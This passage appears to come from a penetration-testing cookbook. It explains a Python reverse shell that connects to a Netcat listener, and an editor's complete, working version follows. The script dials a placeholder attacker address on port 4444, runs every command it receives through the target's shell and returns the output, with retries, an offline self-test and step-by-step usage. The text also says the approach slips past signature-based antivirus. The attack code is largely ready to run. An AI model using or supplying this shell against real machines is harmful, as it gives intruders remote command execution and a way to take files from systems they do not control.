Creating a simple Netcat shell
The following script uses ordinary TCP sockets from Python's standard library (not raw sockets, which need elevated privileges) to build a reverse shell. The compromised machine connects back to your machine, where a Netcat (or similar) listener is waiting; whatever you type into that session is executed on the target and the output, including any files you choose to read, is sent back over the same connection.
The appeal of the Python version is that it is a small plain-text script built only from standard library modules, so it does not trip signature-based antivirus the way a compiled payload often does. It is not undetectable, though: an outbound TCP connection to an unusual port and a Python interpreter spawning shell processes are exactly what egress filtering and endpoint monitoring rules look for.
How to do it…
This is the script that will establish a connection through Netcat and read the input:
import socket
import subprocess
import sys
import time

HOST = '172.16.0.2'  # Your attacking machine to connect back to
PORT = 4444          # The port your attacking machine is listening on


def connect(host, port):  # Python 2 tuple parameters, def connect((host, port)), are a syntax error in Python 3
    ...
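Below is a complete, working version of the reverse shell this recipe builds, added here as an editor's example rather than the book's own code. It keeps the recipe's HOST and PORT placeholders (assumed values) and adds an offline self-test that drives the command loop over a socketpair, so the logic can be exercised without a listener. The function names (run_command, serve_shell, connect_back, demo_over_socketpair) are my own, not the book's.

```python
import socket
import subprocess
import sys
import time

HOST = '172.16.0.2'   # attacking machine to connect back to (assumed placeholder, as in the recipe)
PORT = 4444           # port the attacker listens on, e.g. `nc -lvnp 4444`


def run_command(cmd: str) -> bytes:
    """Run one command line through the local shell; return stdout+stderr as bytes."""
    cmd = cmd.strip()
    if not cmd:
        return b''
    try:
        done = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
                              stderr=subprocess.STDOUT, timeout=30)
        return done.stdout
    except subprocess.TimeoutExpired:
        return b'[command timed out]\n'


def serve_shell(sock: socket.socket) -> int:
    """Command loop on an already-connected socket.

    Reads newline-terminated commands, executes each, and writes the output back
    over the same socket. Stops on 'exit' or when the peer closes the connection.
    Returns the number of commands executed. Closes sock on return.
    """
    executed = 0
    buf = b''
    with sock:
        while True:
            data = sock.recv(4096)
            if not data:            # peer closed: run anything left in the buffer
                if buf.strip():
                    sock.sendall(run_command(buf.decode('utf-8', 'replace')))
                    executed += 1
                return executed
            buf += data
            while b'\n' in buf:     # one command per line, partial lines wait for more data
                line, buf = buf.split(b'\n', 1)
                cmd = line.decode('utf-8', 'replace').strip()
                if cmd == 'exit':
                    return executed
                sock.sendall(run_command(cmd))
                executed += 1


def connect_back(host: str = HOST, port: int = PORT, retries: int = 5,
                 delay: float = 5.0) -> int:
    """Dial the listener, retrying a few times, then serve the shell.

    Returns serve_shell's command count, or -1 if the listener never answered.
    """
    for _ in range(retries):
        try:
            sock = socket.create_connection((host, port), timeout=10)
        except OSError:
            time.sleep(delay)
            continue
        sock.settimeout(None)       # blocking reads for the interactive loop
        return serve_shell(sock)
    return -1


def demo_over_socketpair(script: bytes) -> tuple:
    """Offline exercise of serve_shell: no listener, no network.

    `script` is the byte string an operator would type into Netcat (constructed
    input). Returns (commands_executed, everything the operator would see).
    """
    operator, target = socket.socketpair()
    try:
        operator.sendall(script)
        operator.shutdown(socket.SHUT_WR)   # EOF, so serve_shell ends even without 'exit'
        executed = serve_shell(target)      # closes target when done
        out = []
        while True:
            chunk = operator.recv(4096)
            if not chunk:
                break
            out.append(chunk)
        return executed, b''.join(out)
    finally:
        operator.close()


if __name__ == '__main__':
    if '--selftest' in sys.argv:
        print(demo_over_socketpair(b'echo hello\nexit\n'))
    else:
        sys.exit(0 if connect_back() >= 0 else 1)
```

On the attacking machine start the listener first (`nc -lvnp 4444`), then run the script on the target; each line you type into Netcat is executed and its output printed back. `python3 shell.py --selftest` runs the same command loop over a local socketpair, which is how you can confirm the parsing and execution path work before testing against a real listener. The self-test keeps outputs small on purpose: serve_shell writes with sendall while the operator side is not yet reading, so a multi-megabyte command output would fill the socket buffer and stall.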